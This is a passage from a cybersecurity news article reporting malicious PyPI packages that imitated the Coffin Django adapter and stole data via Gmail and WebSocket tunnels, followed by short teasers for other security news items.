
Socket analysts reported their findings to the Python Package Index (PyPI), and malicious packages were removed from it. However, some of them had been present on PyPI for more than four years, and one package was downloaded more than 18,000 times.
Malware was identified in the following packages:
- Coffin-Codes-Pro (9000 downloads);
- Coffin-Codes-NET2 (6200 downloads);
- Coffin-Codes-NET (6100 downloads);
- Coffin-Codes-2022 (18,100 downloads);
- Coffin2022 (6500 downloads);
- Coffin-Grave (6500 downloads); and
- cfc-bsb (2900 downloads).
The malicious Coffin packages pose as the legitimate Coffin adapter that integrates Jinja2 templates into Django projects.
Their malicious functionality includes covert remote access and data exfiltration via Gmail.
The packages use hardcoded credentials to log into the Gmail SMTP server (smtp.
) and transmit information collected on victim hosts to their operators, thus, enabling them to remotely access compromised systems. Since Gmail is a trusted resource, firewalls and EDR systems are unlikely to consider such activity suspicious.
After sending the stolen data by email, the malware connects to the remote server over SSL using WebSocket and receives instructions on setting up an encrypted bidirectional tunnel from the host to the attacker.
Using the Client class, the malware tunnels traffic from the remote host to the local system to provide access to the internal admin panel and API and perform such operations as file transfer, email theft, execution of shell commands, collection of credentials, and lateral movement.
Based on the email addresses used (e.g. blockchain.
), Socket analysts conclude that the primary purpose of the malicious packages is to steal cryptocurrency, especially taking that similar tactics were previously used to steal Solana private keys.

2025.04.23 — Improper authentication control vulnerability affects ASUS routers with AiCloud
ASUSTeK Computer Inc. fixed an improper authentication control vulnerability in routers with AiCloud. The bug allows remote attackers to perform unauthorized actions on vulnerable devices. The issue…
Full article →
2025.04.29 — FBI Offers 10 million USD for information on Salt Typhoon members
The FBI offers up to 10 million USD for information about members of the Chinese hacker group Salt Typhoon and last year's attack that had…
Full article →
2025.02.08 — Hackers exploit RCE vulnerability in Microsoft Outlook
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned Federal Civilian Executive Branch (FCEB) Agencies that they have to secure their systems from ongoing…
Full article →
2025.03.16 — Researchers force DeepSeek to write malware
According to Tenable, the AI chatbot DeepSeek R1 from China can be used to write malware (e.g. keyloggers and ransomware). DeepSeek was released in January 2025 and caused a stir…
Full article →
2025.01.27 — YouTube plays hour-long ads to users with ad blockers
Users complain that YouTube plays very long unskippable ads. Sometimes such ads are longer than the video the person is watching. The issue was raised…
Full article →
2025.04.10 — April updates released by Microsoft cause issues with Windows Hello
Microsoft warns that some Windows users who have installed the April updates might be unable to login to their Windows services using Windows Hello facial recognition…
Full article →
2025.02.21 — Microsoft fixes vulnerability in Power Pages exploited by cybercriminals
Microsoft patched a severe privilege escalation vulnerability in Power Pages used by hackers as a 0-day. The vulnerability tracked as CVE-2025-24989 (CVSS score 8.2) pertains…
Full article →
2025.02.01 — Critical RCE vulnerability fixed in Cacti
A critical vulnerability has been discovered in the open-source Cacti framework: it enables an authenticated attacker to remotely execute arbitrary code. Vulnerability's ID is CVE-2025-22604; its…
Full article →
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management
Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…
Full article →
2025.01.29 — Google to disable Sync in older Chrome versions
Google announced that in early 2025, Chrome Sync will be disabled in Chrome versions older than four years. Chrome Sync enables users to save and sync their…
Full article →